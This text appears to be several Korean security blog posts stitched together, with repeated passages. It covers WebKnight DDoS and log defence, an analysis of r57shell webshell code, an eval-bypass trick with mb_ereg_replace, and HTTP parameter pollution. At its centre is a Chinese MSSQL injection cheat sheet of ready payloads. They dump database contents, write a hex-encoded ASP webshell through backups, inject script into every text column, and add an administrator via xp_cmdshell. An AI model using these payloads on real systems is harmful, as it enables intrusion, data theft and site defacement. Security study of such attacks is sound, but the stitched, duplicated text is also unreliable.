일단은 한번 막아보기로했다 한대의 서버에만 웹방화벽의 정책을 수정했는데
그날 저녁 또 공격이 시작되었다 것도 사람이 많은 시간대로 ㅠ_ㅠ 정말이지 엔지니어는 업무시간
외에도 쉴수가 없는건지 업보인가...
웹방화벽의 패턴을 올린 서버는 공격을 모두 무력화 시키며 정상적인 서비스 중이었고 나머지 서버는
모두 웹이 뻗어 모니터링에서는 문자를 쉴세없이 보내고 있는 상황...
재빠르게 모든 서버에 접속해서 웹방화벽 정책을 업데이트하고 웹서비스를 재시작 시켰더니 음~~
꽤 생각외의 수확이~~~ 공격 2분만에 서비스 정상화 ^^ DDOS방어 솔루션자체의 가격이 워낙에
부담스러운 요즘에 웹방화벽이 효자역활을 톡톡히 하네요 ^^
적용 방법은 아래와 같습니다.
우선웹방화벽을 사용하고 계시면 DDOS공격시 패턴을 분석합니다.
User agent 의 패턴을 복사하여 robot.xml을 열고 other bad 항목에
추가를 해줍니다.
그리고 webknignt.xml파일일 열어
USE Denied User Agents를 체크를 해줍니다.
간단하면서도 정말 효과적인 부분이지요 ^^
그렇지만 위험부담도 크다는거 명심하세요 user agent를 막게해놓으면 지저분하게 브라우저를 사용하는
일반 사용자의 막힘 현상도 있습니다.
CVE-2009-0238
Secunia-33954
엑셀의 파일포멧취약점이다.
파일 포멧의 레코드중 특정 필드값이 홀수가 되면 조건문에 의해 특정루틴을 수행한다.
Secunia-33954
엑셀의 파일포멧취약점이다.
파일 포멧의 레코드중 특정 필드값이 홀수가 되면 조건문에 의해 특정루틴을 수행한다.
==버전호환성작업======================================================
63 if(version_compare(phpversion(), '4.1.0') == -1)
64 {
65 $_POST = &$HTTP_POST_VARS;
66 $_GET = &$HTTP_GET_VARS;
67 $_SERVER = &$HTTP_SERVER_VARS;
68 }
69 if (@get_magic_quotes_gpc())
70 {
71 foreach ($_POST as $k=>$v)
72 {
73 $_POST[$k] = stripslashes($v);
74 }
75 foreach ($_SERVER as $k=>$v)
76 {
77 $_SERVER[$k] = stripslashes($v);
78 }
79 }
====================================================================
대상 웹애플리케이션의 버전이 php4.1.0버전보다 낮으면 구버전과 신버전의 php 슈퍼전역변수를 매칭시킨다.
이는 버전상의 호환성을 위한 작업이다.
참고:http://php.filearena.net/manual/kr/language.variables.predefined.php
magic_quotes_gpc옵션을 확인한다.
옵션이 on이라면,
post로 받은 모든값에 stripslashes를 적용하여 magic_quotes_gpc를 무력화한다.
마찬가지로 서버변수에 stripslashes를 적용하여 magic_quotes_gpc를 무력화한다.
참고:http://php.mirror.camelnetwork.com/manual/kr/control-structures.foreach.php
참고:http://php.filearena.net/manual/kr/reserved.variables.php#reserved.variables.server
--------------------------------------------------------------------
사용함수
mixed version_compare ( string $version1 , string $version2 [, string $operator ] )
버전비교
첫번째인자가 두번째부다 낮으면 -1, 같으면 0 높으면 1을 리턴
string phpversion ([ string $extension ] )
php버전체크
int get_magic_quotes_gpc ( void )
php.ini의 magic_quotes_gpc세팅을 리턴한다.
옵션이 off이면 0을 리턴, on이면 1을 리턴
magic_quotes_gpc옵션은 GET,POST,COOKIE로 넘어온 ' " \ null값의 앞에 \를 붙여서 에러발생 및 sql인젝션을 방지한다.
이를 수동으로 처리하려면 addslashes()와 stripslashes()함수를 사용해야한다.
string stripslashes ( string $str )
quote기호 삭제
==웹쉘 사용자 인증=====================================================
81 if($auth == 1) {
82 if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
83 {
84 header('WWW-Authenticate: Basic realm="r57shell"');
85 header('HTTP/1.0 401 Unauthorized');
86 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
87 }
88 }
====================================================================
$auth가 1일때,
PHP_AUTH_USER변수가 설정되어있지 않거나 PHP_AUTH_USER값이 $name과 다르거나 PHP_AUTH_PW값이 $pass와 다르면 사용을 불허하는 기능이다.
--------------------------------------------------------------------
PHP_AUTH_USER
HTTP 인증을 사용하는 모듈로서 아파치에서 수행될때, 이 변수는 유저에 의해 제공되는 username으로 설정된다.
PHP_AUTH_PW
HTTP 인증을 사용하는 모듈로서 아파치에서 수행될때, 이 변수는 유저가 제공하는 password로 설정된다.
참고:http://php.filearena.net/manual/kr/reserved.variables.php#reserved.variables.server
to be continue
63 if(version_compare(phpversion(), '4.1.0') == -1)
64 {
65 $_POST = &$HTTP_POST_VARS;
66 $_GET = &$HTTP_GET_VARS;
67 $_SERVER = &$HTTP_SERVER_VARS;
68 }
69 if (@get_magic_quotes_gpc())
70 {
71 foreach ($_POST as $k=>$v)
72 {
73 $_POST[$k] = stripslashes($v);
74 }
75 foreach ($_SERVER as $k=>$v)
76 {
77 $_SERVER[$k] = stripslashes($v);
78 }
79 }
====================================================================
대상 웹애플리케이션의 버전이 php4.1.0버전보다 낮으면 구버전과 신버전의 php 슈퍼전역변수를 매칭시킨다.
이는 버전상의 호환성을 위한 작업이다.
참고:http://php.filearena.net/manual/kr/language.variables.predefined.php
magic_quotes_gpc옵션을 확인한다.
옵션이 on이라면,
post로 받은 모든값에 stripslashes를 적용하여 magic_quotes_gpc를 무력화한다.
마찬가지로 서버변수에 stripslashes를 적용하여 magic_quotes_gpc를 무력화한다.
참고:http://php.mirror.camelnetwork.com/manual/kr/control-structures.foreach.php
참고:http://php.filearena.net/manual/kr/reserved.variables.php#reserved.variables.server
--------------------------------------------------------------------
사용함수
mixed version_compare ( string $version1 , string $version2 [, string $operator ] )
버전비교
첫번째인자가 두번째부다 낮으면 -1, 같으면 0 높으면 1을 리턴
string phpversion ([ string $extension ] )
php버전체크
int get_magic_quotes_gpc ( void )
php.ini의 magic_quotes_gpc세팅을 리턴한다.
옵션이 off이면 0을 리턴, on이면 1을 리턴
magic_quotes_gpc옵션은 GET,POST,COOKIE로 넘어온 ' " \ null값의 앞에 \를 붙여서 에러발생 및 sql인젝션을 방지한다.
이를 수동으로 처리하려면 addslashes()와 stripslashes()함수를 사용해야한다.
string stripslashes ( string $str )
quote기호 삭제
==웹쉘 사용자 인증=====================================================
81 if($auth == 1) {
82 if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
83 {
84 header('WWW-Authenticate: Basic realm="r57shell"');
85 header('HTTP/1.0 401 Unauthorized');
86 exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
87 }
88 }
====================================================================
$auth가 1일때,
PHP_AUTH_USER변수가 설정되어있지 않거나 PHP_AUTH_USER값이 $name과 다르거나 PHP_AUTH_PW값이 $pass와 다르면 사용을 불허하는 기능이다.
--------------------------------------------------------------------
PHP_AUTH_USER
HTTP 인증을 사용하는 모듈로서 아파치에서 수행될때, 이 변수는 유저에 의해 제공되는 username으로 설정된다.
PHP_AUTH_PW
HTTP 인증을 사용하는 모듈로서 아파치에서 수행될때, 이 변수는 유저가 제공하는 password로 설정된다.
참고:http://php.filearena.net/manual/kr/reserved.variables.php#reserved.variables.server
to be continue
mb_ereg_replace()함수는 정규식을 이용해서 스트링을 변환시키는 기능을 하는데
변환된 문자열을 php코드로서 실행시키는 eval옵션을 가지고 있다.
웹쉘제작에 eval() 대신 mb_ereg_replace()를 사용할 수도 있다는 말이다.
eval()함수만 주구장창 막았다가 피보겠네..
예)
<?php
$str='p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';';
mb_ereg_replace('^(.*)$', $str, 'string', 'e');?>
변환된 문자열을 php코드로서 실행시키는 eval옵션을 가지고 있다.
웹쉘제작에 eval() 대신 mb_ereg_replace()를 사용할 수도 있다는 말이다.
eval()함수만 주구장창 막았다가 피보겠네..
예)
<?php
$str='p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';';
mb_ereg_replace('^(.*)$', $str, 'string', 'e');?>
SQL쿼리로 사용되는 파라미터의 값이 중복 사용될 경우 조합되어 쿼리문으로 동작할 수 있다.
ex)
정상 요청
GET /index.asp?query=computer HTTP/1.1
동작하는 쿼리
select * from board where id=computer
HTTP Parameter Pollution
GET /index.asp?query=a&query=b&query=c HTTP/1.1
동작하는 쿼리
select * from board where id=a,b,c
쿼리가 조합될때 중간에 (,)가 삽입된다.
주석을 사용하면 (,)를 삭제할 수 있다.
GET /index.asp?query=a/*&query=*/b/*&query=*/c HTTP/1.1
동작하는 쿼리
select * from board where id=a/*,*/b/*,*/c
ex)
정상 요청
GET /index.asp?query=computer HTTP/1.1
동작하는 쿼리
select * from board where id=computer
HTTP Parameter Pollution
GET /index.asp?query=a&query=b&query=c HTTP/1.1
동작하는 쿼리
select * from board where id=a,b,c
쿼리가 조합될때 중간에 (,)가 삽입된다.
주석을 사용하면 (,)를 삭제할 수 있다.
GET /index.asp?query=a/*&query=*/b/*&query=*/c HTTP/1.1
동작하는 쿼리
select * from board where id=a/*,*/b/*,*/c
■获取数据库名
and db_name()=0
and db_name(0)=0
and db_name(__i__)=0
and quotename(db_name(__i__))=0
■获取用户名
and user=0
■获取版本信息
and @@version=0
■获取服务器名
and @@servername=0
■获取服务名
and @@servicename=0
■获取系统用户名
and system_user=0
■一次性获取所有基本信息
AnD (dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0
■一次性探测权限
AnD (cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006f0077006e0065007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006200610063006b00750070006f00700065007200610074006f007200) aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x640062005f006400610074006100770072006900740065007200) aS vArChAr))=0
■获取数据库的数目
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0
■获取数据库文件名
and (select top 1 filename from (select top __i__ filename from master..sysdatabases order by filename) t order by filename desc)=0
■同时获取数据库名和数据库文件名
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY nAmE dEsC)=0
■获取数据库的表的数目
and (select cast(count(1) as varchar)+char(9) from <数据库名>..sysobjects where xtype=0x75)=0
■获取数据库的表
and (select top 1 name from (select top __i__ name from <数据库名>..sysobjects where xtype=0X75 order by name) t order by name desc)=0
and (select top 1 quotename(name) from <数据库名>.dbo.sysobjects where xtype=char(85) AND name not in (select top __i__ name from <数据库名>.dbo.sysobjects where xtype=char(85)))=0
■获取表的字段的数目
and (select cast(count(1) as varchar)+char(9) from <数据库名>..syscolumns where id=object_id('<表名>'))=0
■获取数据库表的字段
and (select top 1 name from (select top __i__ name,id from <数据库名>..syscolumns where id=object_id('<表名>') order by name) t order by name desc)=0
and (select col_name(object_id('<表名>'),__i__))=0
■获取满足条件的表的记录数
AnD (sElEcT cAsT(cOuNt(1) aS nvArChAr(100))+cHaR(9) FrOm <数据库名>..<表名>)=0
■获取数据库的内容
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(<列名1> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名2> aS nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(<列名3> aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__ <列名1>,<列名2>,<列名3> FrOm <数据库名>..<表名> oRdEr bY <排序列名>) t oRdEr bY <排序列名> dEsC)=0
■基于日志差异备份
--1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<临时文件名:e:\wwwroot\m.asp>' With Init--
--2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
--3. 备份并获得文件,删除临时表
;Backup Log <数据库名> To Disk = '<要生成的文件名:e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
■基于数据库差异备份
1. 进行差异备份准备工作
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<临时文件名:0x633A5C617364662E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
3. 备份数据库并作最后的清理工作
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<最终需要备份出的文件名:0x633A5C617364662E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
■数据库插马(插指定数据库的指定表的满足条件的记录)
;update <数据库名>..<表名> set <字段名>=<字段名>+'<script>alert("有漏洞啊。")</script>' where <要满足的条件>--
■数据库批量插马(插所有可插入的字段和记录,危险!!请谨慎操作!!)
;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(<要插入的内容(0x编码形式)> aS vArChAr(200<此处长度应做相应修改>))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--
;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,s yscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<要插入的内容>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor--
■执行命令行(无结果返回)
;exec master..xp_cmdshell 'net user name password /add & net localgroup administrators name /add'--
■恢复存储过程 xp_cmdshell
;Exec Master..sp_dropextendedproc 0x780070005F0063006D0064007300680065006C006C00;Exec Master..sp_addextendedproc 0x780070005F0063006D0064007300680065006C006C00,0x78706C6F6737302E646C6C--
■SQLServer 2005 开启和关闭 xp_cmdshell
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',1;RECONFIGURE;
关闭 xp_cmdshell
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell',0;RECONFIGURE;
■SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet
开启:
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
关闭:
;EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc Distributed Queries',0;RECONFIGURE;
■SQLServer 2005 日志差异备份
alter database [testdb] set recovery full
declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup database __dbname__ to disk=@d with init--
drop table [itpro]--
create table [itpro]([a] image)--
declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--
insert into [itpro]([a]) values(__varchar(木马内容))--
declare @d nvarchar(4000) set @d=__nvarchar(文件名) backup log __dbname__ to disk=@d with init--
drop table [itpro] declare @d nvarchar(4000) set @d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with init--
古木系统安全-管中窥豹 SQL注入工具
QQ: 100194004 100194004
网易POPO: gzkbsql@163.com
중국발 Mass SQL 인젝션 공격이 다시 한 번 주춤하고 있습니다. 실제로 최근 들어 공격 횟수가 급격히 줄어 들고 있네요. 아마 인터넷 상에 퍼져있는 다양한 정보들의 도움으로 웹 서버와 웹 소스의 보안이 강화되었고, 이로 인해 쿠키 변조를 통한 Mass SQL 인젝션 공격도 약발이 다 되었나 봅니다.
음… 하지만 공격 횟수가 단순히 줄어 들었을 뿐이지 일련의 사태들이 완벽하게 종식된 것은 아니기 때문에 서버 관리자 분들의 꾸준한 관심과 관리에는 변함이 없어야 할 것입니다.
최근 '웹나이트'를 비롯한 웹 방화벽에 대한 관심도가 크게 향상되었음은 물론이며 윈도우즈 웹 서버에 기본적으로 웹나이트를 비롯한 웹 방화벽이 설치될 정도로 보안 의식이 강화되었다고 합니다.
사실 웹나이트 외에도 하드웨어 웹 방화벽 장비나 기타 웹 방화벽 상품들이 시중에 많이 나와 있습니다만(따지고 보면 그렇게 많은 것도 아닙니다만…) 아무래도 비용적인 부담 때문에 많은 분들이 웹나이트를 선택해서 사용하고 계신 것으로 알고 있습니다.
서론이 길었네요. 예전 글에서도 누누히 말씀 드렸지만 웹나이트는 설치보다 관리가 몇 배는 더 중요합니다. 본 글에서는 웹나이트 설치 후, 반드시 해야 할 일 중 딱 두 가지만 다시 한 번 보기 좋게 정리해 보았습니다. 도움이 되셨으면 좋겠네요~
* 본 글은 '웹나이트 2.1 버전'과 '윈도우즈 2003 스탠다드 SP2 + IIS 6' 를 기반으로 작성되었습니다.
1. 웹나이트 로그를 반드시 정기적으로 확인하세요.
서버 관리자의 주된 업무 중 하나인 로그 확인 및 분석! 웹나이트 역시 정기적인 또는 주기적인 로그 확인이 무엇보다 중요합니다. 웹나이트 2.X 버전부터는 별도의 로그 애널라이저(analysis.exe)가 동봉 되어 있기 때문에 단순히 텍스트 파일을 열어 확인하는 것보다는 한결 수월해졌습니다.
로그 확인의 기본은 해당 로그의 형식 파악입니다. 그럼, 웹나이트에서 남기는 로그의 형식을 알아야 겠죠? 웹나이트의 로그 형식은 다음과 같습니다.
시간 ; 웹사이트 식별자 ; 이벤트 ; 클라이언트 IP주소 ; 사용자 명 ; 이벤트와 관련된 자세한 사항
이해를 돕기 위해 실제 웹나이트 로그를 통해 구분을 나눠보겠습니다.
03:21:39 ; W3SVC1 ; OnPreprocHeaders ; ***.***.***.*** ; ; GET ; /test/test.asp ; id=37'%20and%20user%2Bchar(124)=0%20and%20"=' ; BLOCKED: possible SQL injection in querystring ; HTTP/1.1 ; ASPSESSIONIDAQDBDDAD=EDIAJJBAFOHJCEKKEMBNCEJD
1. 시간 : 03:21:39
2. 웹사이트 식별자 : W3SVC1
3. 이벤트 : OnPreprocHeaders
4. 클라이언트 IP주소 : ***.***.***.***
5. 사용자 명 : 내용 없음
6. 이벤트와 관련된 자세한 사항 : GET ; /test/test.asp ; id=37'%20and%20user%2Bchar(124)=0%20and%20"=' ; BLOCKED: possible SQL injection in querystring
로그 마지막에 'HTTP/1.1….' 부분은 크게 염두할 사항이 아니므로 과감히 잘라냈습니다. 위의 예제 로그를 분석해 보면 GET 방식으로 전달 받은 변수값에 SQL 인젝션 코드가 삽입되어 있어 웹나이트에 의해 클라이언트의 접근이 차단된 것임을 알 수 있습니다. 아마 URL을 직접 변조하여 SQL 인젝션을 시도했던 모양입니다…-_-;;
만일 로그 분석을 통해 공격 시도가 확인되었다면 서버 관리자는 공격자의 IP주소를 발췌하여 한국인터넷진흥원(NIDA) WHOIS 페이지(http://whois.nida.or.kr)에서 IP주소의 관리사와 관리자 그리고 제원을 확인해야 합니다.
조회된 정보를 살펴보면 하단에 네트워크 어뷰즈(Network Abuse) 담당자의 연락처와 이메일 주소를 확인하실 수 있을 겁니다. 보통 이 네트워크 어뷰즈 담당자의 이메일 주소로 귀사에서 관리하고 있는 네트워크 자원에서 SQL 인젝션 공격(또는 해킹 공격)이 접수되었다는 내용의 메일을 발송해 줍니다.
메일 내용에는 공격자의 IP주소와 해당 서버의 IP주소, 공격이 확인된 시간과 자세한 로그(웹나이트 로그에서 필요한 부분만 발췌하면 되겠죠?) 등을 반드시 동봉해 주어야 합니다.
만일 공격자의 IP주소를 국내 기관에서 관리하고 있다면 보통 처리 결과에 대한 회신이 1~2주 이내로 도착할 것입니다. 해외 기관에서 관리하고 있을 경우에는 처리 결과에 대한 구체적인 회신은 없을지라도 약 70% 이상 내부적으로 조치가 완료되니 너무 염려하지 마시구요.(참고로 해당 ISP 업체가 막장인 경우에는… 답이 없습니다.)
* 참고로 해외 기관에서 관리하고 있는 IP주소일 경우 한국인터넷진흥원 WHOIS 페이지에서 바로 조회 결과가 출력되지 않습니다. 해당 IP주소에 대한 정보 대신 조회해 볼 수 있는 해외 기관의 웹사이트 주소가 출력되는데. 해당 웹사이트로 이동하셔서 다시 한 번 IP주소에 대한 정보를 조회해 보시기 바랍니다.
이제 가장 중요한 것은 재접근 자체를 원천봉쇄 하는 것입니다. 서버 앞 단에 방화벽 장비 등이 이미 설치되어 있다면 정말 베스트겠죠?(방화벽 장비가 설치되어 있지 않다면 윈도우즈 방화벽, IPSEC, IIS 설정 등으로 차단할 수 있습니다만, 역시 방화벽 장비가 쵝오…!)
만일 로그 분석을 통해 확인된 공격자의 IP주소가 123.123.123.123 이라며 단순히 123.123.123.123 IP주소만 차단할 것이 아니라 C클래스, 즉 123.123.123.0 부터 123.123.123.255 까지 대역 자체를 차단하는 것이 좋습니다.
그 이유는 공격자의 IP주소가 해커의 손아귀에 들어간 흔히 말하는 좀비 서버의 IP주소라면 같은 세그먼트에 연결되어 있는 다른 서버 역시 좀비 서버가 되었을 가능성이 높기 때문입니다. 보통 같은 세그먼트에 연결된 서버끼리는 포트뿐만 아니라 IP 자체를 오픈해 놓는 경우가 많습니다. 포트스캐닝 프로그램만 한 번 돌려보면 손쉽게 다음 타겟을 찾을 수 있지요.
2. 새로운 해킹 동향에 대해 관심을 가져주세요.
어떤 분께서 이런 말씀을 하시더라구요. '보안은 곧 관심이다.' 라고요. 저는 이 말에 100배 공감합니다. 새로운 해킹 수법은 이미 그 피해 사례가 확대되기 전에 설이 풀리기 마련입니다. 물론 그 설에는 다양한 정보들이 내포되어 있습니다.
새로운 해킹 수법에 의한 피해 사례는 보통 국내 보다는 해외에서 먼저 발견되는 경우가 많습니다. 보통 일본과 미국 쪽에서 먼저 리포팅 되곤 하는데 영어의 압박이 있긴 합니다만 해석이 불가능 할 정도로 어려운 글들은 아닙니다. 사실 우리가 보안과 관련해서 사용하는 용어들도 영어가 많기 때문에 그나마 위안으로 삼으시면…-_-;;
그리고 이런 정보들이 국내 IT 보안 전문 업체나 해커들에 의해 해석되고, 분석되서 손쉽게 재가공된 정보가 검색될 때도 국내 피해 사례는 그렇게 크지 않습니다.(거의 없다고 봐도 무방할 정도로…) 늦지 않았다는 얘기지요. 이번 쿠키 변조를 통한 Mass SQL 인젝션도 그랬고, 그 이전에 Mass SQL 인젝션도 그랬습니다.
관심을 갖는다면 충분히 사전에 예방할 수 있습니다. 음… 제가 시간 날 때마다 방문하는 웹사이트 몇 군데를 소개해 드릴까 합니다.
- http://www.secureworks.com/research/threats/
- http://www.nchovy.kr/
- http://swbae.egloos.com/
- http://www.krcert.or.kr/index.jsp
- http://www.us-cert.gov
지난 2008년 10월 3일, 이름만 들어도 제 몸을 흠칫! 하게 만드는 Cain(풀네임은 Cain & Abel)이 4.9.23 버전으로 업데이트 된 바 있습니다.
# 왠지 그림 마저 무섭다…ㅎㄷㄷ
사실 Cain은 ARP Spoofing을 비롯한 네트워크 유해 현상을 발생시키기 위해 제작된 프로그램이 아닙니다. 다만 그 기능이 너무 출중하다보니 네트워크 해킹 툴로 쓰이는 불명예를 얻게 되었을 뿐이죠. Cain 프로그램에 대한 개요나 릴리즈노트 등은 아래 공식 웹사이트를 통해 좀 더 정확하게 확인하실 수 있을 겁니다. 시간 나실 때 한 번 방문해 보세요.
아무튼 새로운 버전이 나왔으니 얼마나 달라졌을까 궁금했을터! 그래서일까? 아니면 우연의 일치일까? 정확한 진의는 알 수 없지만, 아무튼 최근 들어 간헐적으로 ARP Spoofing이 발생하고 있습니다. 물론 경유지 서버에서 검출되는 Cain은 4.9.23 버전. 범인의 국적은 10명의 10명 모두 역시나 짱깨들이죠
문뜩 처음 Cain을 접했을 때가 생각납니다. 저는 이 악마 같은 프로그램을 보며 '대… 대박인데?' 를 입에서 떼어 놓질 못했지요. 거기다 프리웨어라니… 사용자가 품고 있는 사용 목적에 따라 사탄의 종자가 될 수도 있고, 눈부신 천사가 될 수도 있는 Cain! 그건 아마 스니퍼(Sniffer)가 갖고 있는 그것(양날의 칼 정도…)과 같을 겁니다.
각설하고!
누군가 서버에 프로그램을 설치했다는 것은 원격데스크탑을 통해 서버에 접속했다는 뜻입니다. 그리고 대부분 이 해킹 수법의 시작이 SQL 인젝션이라는 것! 많은 분들이 알고 계신 사실 중에 하나죠.
SQL 인젝션을 통해 서버의 최상위 권한이 탈취 되었다는 것은 MSSQL의 SA 계정을 웹소스에 직접 적용하여 사용하고 있다는 일종의 간접적인 예입니다. 병적으로 SA 계정을 싫어하는 저는 SA 계정을 웹소스에 적용하여 사용하는 일부 웹프로그래머들의 작태가 이해 되지 않습니다. 관리용 목적으로 생성되는 계정을 웹 서버와 DB 서버 간의 통신에 이용하다니… SQL 인젝션이 발생하면 아무 제한 사항 없이 해커에게 SA 계정을 사사해 주는 격이 되어 버리는데 '제발 좀 뚫어주세요~' 이것과 차이점이 없습니다. MSSQL 로그인 계정을 생성해서 데이터베이스와 매핑하는 일이 어려운 작업도 아니고 마우스 클릭 몇 번만 하면 손 쉽게 처리할 수 있는 부분인데 왜 굳이 SA 계정을 사용해야만 하는 것인지…
지금이라도 늦지 않았으니 웹 서버와 DB 서버 간의 통신에 SA 계정을 사용하고 계시다면 빠른 시일 내에 MSSQL 로그인 계정으로 수정하시길 간곡히 부탁 드립니다. ARP Spoofing이라는 거 내 서버에만 문제 생기는 게 아닙니다. 같은 세그먼트에 묶여 있는 죄 없는 다른 서버들에게도 같이 피해를 주는 것입니다.